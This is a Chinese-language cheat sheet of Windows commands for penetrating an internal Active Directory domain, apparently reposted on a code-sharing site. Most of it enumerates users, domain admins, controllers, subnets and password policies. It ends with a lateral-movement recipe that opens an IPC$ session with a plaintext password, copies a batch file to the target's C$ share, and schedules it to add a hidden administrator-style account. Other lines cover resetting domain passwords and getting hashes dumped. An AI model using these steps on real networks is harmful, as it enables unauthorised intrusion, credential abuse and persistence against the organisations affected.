[內網滲透]域滲透的基本命令


ipconfig /all #查詢本機 IP 段,所在域等
net user //本機用戶列表
net localgroup administrators //本機管理員[通常含有域用戶]
net session // 查看當前會話
net use \\ip\ipc$ password /user:username // 建立域內 IPC 會話[空連接]
net share //查看 SMB 指向的路徑[即共享]
net view //查詢同一域內機器列表
net view /domain //查詢域列表
net start // 查看當前運行的服務
whoami //查詢賬號所屬權限
whoami/all //查看 sid 值
net accounts // 查看本地密碼策略
net accounts /domain // 查看域密碼策略
netstat –an //網絡連接查詢
route print //路由打印
nltest /dsgetdc:域名 //查詢域控主機名。 如 nltest /dclist:bk
nltest /domain_trusts //可以列出域之間的信任關系
net view /domain:Secwing
查看 Secwing 域中計算機列表
net time /domain //判斷主域,主域服務器都做時間服務器
net config workstation // 當前登錄域
net group "enterprise admins" /domain 企業管理組
net user /domain wen@126.com test //修改域用戶密碼,需要域管理員權限,或者 Ctrl+Alt+Del 點擊修改則不需要域管理員權限
net user /domain // 查詢域用戶
net group /domain // 查詢域里面的工作組
net group "domain admins" /domain // 查詢域管理員用戶組
net localgroup administrators /domain //登錄本機的域管理員
net group "domain controllers" /domain // 查看域控制器(如果有多台)
mstsc /admin //遠程桌面登錄到 console 會話解決 hash 無法抓出問題
dsquery computer domainroot -limit 65535 && net group “domain computers” /domain  //列出該域內所有機器名
dsquery user domainroot -limit 65535 && net user /domain //列出該域內所有用戶名
dsquery subnet //列出該域內網段划分
dsquery group && net group /domain //列出該域內分組
dsquery ou //列出該域內組織單位
dsquery server && net time /domain //列出該域內域控制器
net use \\192.168.1.5 Passw0rd! /user:admin     //建立 ipc 連接
copy add.bat \\192.168.1.5\c$\wmpub     //復制 add.bat 到目標 C 盤 wmpub 目錄
add.bat 里面的內容是 net userTwi1ight Passw0rd! /add     //添加 Twi1ight 用戶
net time \\192.168.1.5     //查看目標當前時間,得到當前時間是 21:50:52
at \\192.168.1.5 21:52 c:\wmpub\add.bat     //告訴目標在21:52的時候運行c:\wmpub\add.bat
at \\192.168.1.5     //查看目標的計划任務列表


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM